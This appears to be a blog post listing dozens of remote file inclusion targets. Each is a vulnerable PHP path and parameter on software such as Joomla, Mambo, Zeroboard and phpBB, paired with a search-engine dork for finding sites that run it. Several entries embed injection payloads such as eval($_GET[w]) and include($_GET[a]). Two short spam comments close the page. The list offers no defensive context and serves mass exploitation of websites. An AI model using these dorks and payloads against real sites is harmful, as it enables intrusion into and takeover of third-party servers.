- admin/editor2/spaw_control.class.php?spaw_root= "cjaycontent"
- write.php?dir= pds_pic
- index.php?page= %3A%22index%2Ephp%3Fpage%3D%22%20%5Bfunction%2Einclude%5D
- ?sourcedir= "Querystring.php" -p 100
- /skin/happycast_category_lightblack/login.php?dir= "skin by Zetyx" de
- myevent.php?myevent_path= inurl:”uk/myevent.php
- /?_SERVER[DOCUMENT_ROOT]= "Powered by Clicknet CMS"
- /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path= “/includes/joomla.php”
- engine/api/api.class.php?dle_config_api= "Powered By DataLife Engine"
- index.php?rootpath= "Powered by TBDev v2.0"
- /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= modules.php?name=PNphpBB2
- index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= "Mambo"
- /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path= "browse/category_id,2" -p 100
- tools/send_reminders.php?noSet=0&includedir= WebCalendar v1.0.4 -p 100
- contrib/mx_glance_sdesc.php?mx_root_path= "mxBB"
- /admin/spaw/spaw_control.class.php?spaw_root= "xt_conteudo"+com.ua -p 55
- /poll/booth.php?include_path= "action"+"poll_ident"
- /appserv/main.php?appserv_root= "The AppServ Open Project"
- /s_loadenv.inc.php?DOCUMENT_ROOT= "news+"curPos%3d"
- setup.php?dir= ggambo6000
- /index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= "Forgotten your password?"+"No account yet?"
- /includes/ktedit/toolbar.php?dirDepth= ktmlpro
- classes/core/language.php?rootdir= "LimeSurvey"
- .rfi ?DOCUMENT_ROOT= "e404.php"+"netcat_require"
- /?mosConfig_absolute_path= /includes/joomla.php site:ru
- /rgboard//include/mail.inc.php?skin_board_path= rgboard
- /index.php?page= index.php%"Submit%Articles"%"Member%Login"%"Top%Authors" -p100
- /ask_password.php?dir= ggambo6200 -p100
- index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path= %22%2Fincludes%2Fjoomla.php%22
- /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= News,cntnt01,detail,0&cntnt01articleid=
- /?page= "index.php?page=" site:my
- /?pg= "index.php?pg=" site:my
- /comments.php?id={${include($ddd)}}{${exit()}}&ddd= "poll_ssi.php"
- /inc/formmail.inc.php?script_root= “Powered By Form Mail Script”
- /index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= "Forgotten your password?"+"No account yet?"
- /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path= "browse/category_id,2" -p 100
- index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path= %22%2Fincludes%2Fjoomla.php%22 site:.org
- /include/print_category.php?setup[use_category]=1&dir= skin by RuVin
- /skin/zero_vote/error.php?dir= "zeroboard"
- /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path= "com_lmo"
- /index.php?_SERVER[DOCUMENT_ROOT]= "/bbs.php?mode=list"
- /assets/snippets/reflect/snippet.reflect.php?reflect_base= /MODx/
- /update/update5.php?lang= "Powered by photokorn"
- index.php?page= index.php%"Submit%Articles"%"Member%Login"%"Top%Authors"
- /assets/snippets/reflect/snippet.reflect.php?reflect_base= “/index.php?id=5?
- /modules/Forums/admin/admin_words.php?phpbb_root_path= “Thai Edition by ThaiNuke”
- ///skin/ggambo7002_board/comment_modify.php?dir= comment_modify.php?
- /modules/userstop/userstop.php?exbb[home_path]= Powered by ExBB
- plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]= “By Geeklog” “Created this page in” +seconds +powered
- //?_SERVER[DOCUMENT_ROOT]= "getuserinfo2.php"
- /include.php?path=psp/user.php&site= "psp/user.php&site="
- errors.php?error= "Classifieds for our community"
- config.inc.php?path_escape= "XZero Community Classifieds" "XZero Community Classifieds"
- ///bbs/skin/ggambo5100_board/setup.php?dir= "/bbs/skin/"
- /components/com_sitemap/sitemap.php?mosConfig_admin_path= "option,com_sitemap"
- /main.php?_zb_path= "zeroboard"+jp
- /Lboard///?_SERVER[DOCUMENT_ROOT]=
- /sendstudio/admin/includes/createemails.inc.php?ROOTDIR= "/sendstudio/"
- /?_zb_path= "zeroboard"*.zboard* site:org
- /?_zb_path= "dq_libs"
- /skin/zero_vote/error.php?dir= "Zeroboard" *so*
- /tools/send_reminders.php?noSet=0&includedir= includes/php-dbi.php -p 50
- //?_SERVER[DOCUMENT_ROOT]= ""weiterempfehlen""
- index.php?page= %3A%22index%2Ephp%3Fpage%3D%22%20%5Bfunction%2Einclude%5D -p 100
- /common/db.php?commonpath= "playlist.php"
- //?_zb_path= zboard/zboard.php
- modules/My_eGallery/index.php?basepath= "My_eGallery"+.ru
- /config/config_main.php?INC= "Your Search Starts Here"
- /forum/viewtopic.php?p=256&sid=1dd3cd63e16411088dbadc3b6b5bafaf//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a= /forum/viewtopic.php
waooooooooooooo very nice
BalasHapusEnterprise application development
nice working keep it upsee more
BalasHapus